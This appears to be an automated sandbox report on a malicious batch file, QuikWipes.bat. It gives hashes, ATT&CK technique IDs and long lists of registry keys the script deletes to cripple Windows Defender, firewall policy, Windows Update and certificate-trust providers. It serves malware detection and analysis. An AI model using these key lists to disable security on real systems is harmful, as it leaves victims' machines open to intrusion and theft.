6d6c1778838f50e53bf5f2858df28d4f7e50c376c4018d7a7ce1036ff99730f2

General

Target

QuikWipes.bat
Size

47KB
MD5

4159f980bd03895ac2431f5264cbe0cf
SHA1

6b197f4f4ccf3f201c1ecc0ea145e79895acfb9f
SHA256

6d6c1778838f50e53bf5f2858df28d4f7e50c376c4018d7a7ce1036ff99730f2
SHA512

181bf22d9446b2904dfc2cd8c76f66a43b99650d7c2db180646f00126838ba0c58afc849572e65eb613ba7f37df58a17d3a85b4742a14b7bde0e7135a50af0d8
SSDEEP

192:a111111111111111111111111111111111111111111111111111111111111111:y

Score

10^/10

adware evasion persistence spyware stealer

Malware Config

Signatures

Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	reg.exe

Modifies firewall policy service 2 TTPs 36 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\AuthorizedApplications	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\GloballyOpenPorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	reg.exe

Modifies security service 2 TTPs 18 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\MpsSvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\services\WinDefend\Security	reg.exe

Manipulates Digital Signatures 1 TTPs 64 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{189A3842-3041-11D1-85E1-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{64B9D180-8DA2-11CF-8736-00AA00A485EB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{64B9D180-8DA2-11CF-8736-00AA00A485EB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2130	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2003	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{189A3842-3041-11D1-85E1-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2009	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.1.1	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2002	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{000C10F1-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{000C10F1-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.26	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2130	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindLocalizedName\LocalizedNames	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.16.1.1	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2004	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.2	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{7801EBD0-CF4B-11D0-851F-0060979387EA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.20	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{06C9E010-38CE-11D4-A2A3-00104BD35090}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCTLUsage	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyRevocation	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.27	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{1A6631C0-3EA2-11D1-AE01-006097C6A9AA}	reg.exe

Modifies Installed Components in the registry 2 TTPs 52 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9381D8F2-0288-11D0-9501-00AA00B911A5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{45ea75a0-a269-11d1-b5bf-0000f8051515}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{9381D8F2-0288-11D0-9501-00AA00B911A5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{25FFAAD0-F4A3-4164-95FF-4461E9F35D51}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{23A20C3C-2ADD-4A80-AFB4-C146F8847D79}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{45ea75a0-a269-11d1-b5bf-0000f8051515}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{CE4BC71D-A88B-4943-BB3D-AF9C0E7D4387}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5A604D2C-E968-429B-8327-62B5CE52126D}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{7C028AF8-F614-47B3-82DA-BA94E41B1089}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{FEBEF00C-046D-438D-8A88-BF94A6C9E703}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6fab99d0-bab8-11d1-994a-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{6fab99d0-bab8-11d1-994a-00c04f98bbc9}	reg.exe

Registers new Print Monitor 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Local Port	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor	reg.exe
